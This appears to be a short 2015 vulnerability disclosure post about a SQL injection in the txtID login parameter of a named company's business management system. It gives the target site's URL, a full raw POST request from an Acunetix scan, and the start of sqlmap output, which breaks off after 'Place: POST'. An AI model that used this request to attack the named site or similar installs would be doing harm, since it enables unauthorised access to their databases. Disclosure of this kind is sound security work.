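红黑 user (guest) |
2015-01-16 09:30 |
Generic SQL injection vulnerability in a business management system
The 星联盟 integrated business management system, developed by 苏州赛思科技有限公司
The system's txtID parameter is vulnerable to injection
6 cases as proof:
1. http://www.sciencesoft.com.cn/Login.aspx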
POST /Login.aspx?ReturnUrl=/UI HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.sciencesoft.com.cn/Login.aspx
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.sciencesoft.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=edqbdbmr&txtID=1&txtPwd=1&__VIEWSTATE=/wEPDwUKMjAwOTY4Mjc0OWRkwR2ccAPcAKsE%2bLjfk0vNHuZ9o6/u4G05gw0yP0aHBg0%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST